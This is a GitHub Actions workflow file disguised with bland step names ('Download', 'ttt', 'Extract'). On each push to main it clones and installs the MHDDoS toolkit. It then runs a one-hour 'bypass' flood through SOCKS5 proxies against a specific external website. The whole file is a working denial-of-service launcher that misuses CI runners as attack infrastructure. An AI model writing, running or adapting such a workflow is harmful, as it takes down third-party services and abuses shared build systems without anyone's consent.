name: Download 

on: 
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: ttt
      run: apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt
      
    - name: Extract
      run: python start.py bypass https://bitcoin.unlifreecrypto.com 5 101 socks5.txt 100 3600
